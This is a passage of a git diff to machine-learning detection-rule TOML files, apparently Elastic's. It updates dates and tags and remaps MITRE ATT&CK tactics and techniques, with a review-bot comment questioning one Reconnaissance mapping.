"https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 677898f0c23..77d18fd3e27 100644 
--- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -116,14 +116,23 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 390ff8b41e2..1e4fb206c9e 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -78,13 +78,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8f55-07827ac3acc9" severity = "low" -tags = [ - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Initial Access", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
@@ -123,19 +117,49 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml index 8ad611b108e..521c82e9536 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
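Review bot: The new `[[rule.threat]]` entry mapping T1595.003 Wordlist Scanning under TA0043 Reconnaissance only fits if the rare URLs are inbound requests against the organisation's own web servers, whereas the rule's own note frames the uncommon URLs as "associated with command-and-control activities"; Active Scanning is a pre-compromise technique performed by the adversary against the victim, so the mapping depends on the Packetbeat sensor observing server-side traffic. The same question applies to the T1595 Active Scanning entry added to command_and_control_ml_packetbeat_rare_user_agent.toml. If both directions are intended, a short sentence in the rule note such as "Rare URLs requested by external clients may also indicate wordlist-based scanning of internal web applications" would document why a Reconnaissance tactic sits on a command-and-control rule; otherwise the Reconnaissance entry and its `"Tactic: Reconnaissance"` tag should be dropped together.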
@@ -76,13 +76,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8d77-07827ac4cee0" severity = "low" -tags = [ - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -121,19 +115,31 @@ User agents identify applications interacting with web servers, typically browse - Report the incident to the appropriate internal teams and, if necessary, escalate to external cybersecurity authorities or partners for further investigation and support.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index e2c5d123724..50b24290b61 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -135,14 +135,18 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 3305439fe96..06017cb240b 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
@@ -115,48 +115,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "e26aed74-c816-40d3-a810-48d6fbd8b2fd" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Credential Access", "Tactic: Initial Access", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index af93615b61d..f233da07dca 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml 
+++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -108,31 +108,40 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/initial_access_ml_auth_rare_user_logon.toml b/rules/ml/initial_access_ml_auth_rare_user_logon.toml index 47a768779c8..381607c588e 100644 
--- a/rules/ml/initial_access_ml_auth_rare_user_logon.toml +++ b/rules/ml/initial_access_ml_auth_rare_user_logon.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -116,35 +116,30 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "138c5dd5-838b-446e-b1ac-c995c7f8108a" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Persistence", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b4a53fb620b..b592f2f66d1 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -77,26 +77,35 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" 
diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml index 3af1d24172b..881ee8ef844 100644 --- a/rules/ml/ml_high_count_events_for_a_host_name.toml +++ b/rules/ml/ml_high_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
@@ -92,59 +92,3 @@ The detection of a spike in host-based traffic leverages machine learning to ide - Implement network segmentation to limit the spread of potential threats and reduce the impact of similar incidents in the future. - Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional resources are needed for a comprehensive response.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 39e7bd4d1f3..108b838ecfb 100644 --- a/rules/ml/ml_high_count_network_denies.toml 
+++ b/rules/ml/ml_high_count_network_denies.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -74,7 +74,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "eaa77d63-9679-4ce3-be25-3ba8b795e5fa" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Impact", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
@@ -114,70 +114,38 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] -id = "T1590" -name = "Gather Victim Network Information" -reference = "https://attack.mitre.org/techniques/T1590/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" +id = 
"T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/ml/ml_high_count_network_events.toml b/rules/ml/ml_high_count_network_events.toml
index 788730443c5..84ceaa444bc 100644
--- a/rules/ml/ml_high_count_network_events.toml
+++ b/rules/ml/ml_high_count_network_events.toml
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75
@@ -110,55 +110,3 @@ Machine learning models analyze network traffic patterns to identify anomalies, - Review and update network access controls and permissions to ensure only authorized users and devices have access to sensitive data and systems. - Implement enhanced monitoring and alerting for similar traffic patterns to improve early detection and response to future incidents.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" - diff --git a/rules/ml/ml_linux_anomalous_network_activity.toml b/rules/ml/ml_linux_anomalous_network_activity.toml index 6993543b038..b1e1b9fef20 100644 --- a/rules/ml/ml_linux_anomalous_network_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_activity.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -82,68 +82,18 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "52afbdc5-db15-485e-bc24-f5707f820c4b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index be92e900df7..58d52643cb3 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -72,14 +72,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "3c7e32e6-6104-46d9-a06e-da0f8b5795a0" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
@@ -121,39 +114,12 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index d2128f0bf36..caedf9aab62 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
@@ -92,28 +92,3 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac - Monitor network traffic for any signs of unusual activity or attempts to exploit the situation further. - Escalate the incident to the security operations team for a deeper forensic analysis and to determine if additional hosts are affected.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 21d0d1aac74..211e1efd87e 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -81,7 +81,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "17e68559-b274-4948-ad0b-f8415bb31126" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
